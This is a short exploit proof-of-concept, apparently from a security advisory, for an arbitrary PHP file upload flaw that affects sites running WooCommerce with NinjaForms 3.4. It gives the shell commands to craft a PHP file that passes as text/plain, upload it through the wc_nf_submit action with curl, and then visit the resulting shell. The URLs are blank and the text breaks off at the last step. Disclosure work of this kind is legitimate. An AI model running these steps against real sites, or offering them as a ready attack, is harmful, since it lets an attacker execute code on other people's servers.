Make sure to have both WooCommerce and NinjaForms (NF's latest version on the 3.4 branch) installed, then follow those instructions:

1 - Run the following shell command to create a PHP file who's mime type will be detected as text/plain:

echo 'Hello world! <?php phpinfo();' > shell.php

2 - Run the following curl command to upload the malicious PHP file onto the site:

curl '' -F 'action=wc_nf_submit' -F 'f[]=@shell.php'

3 - Visit the uploaded shell at '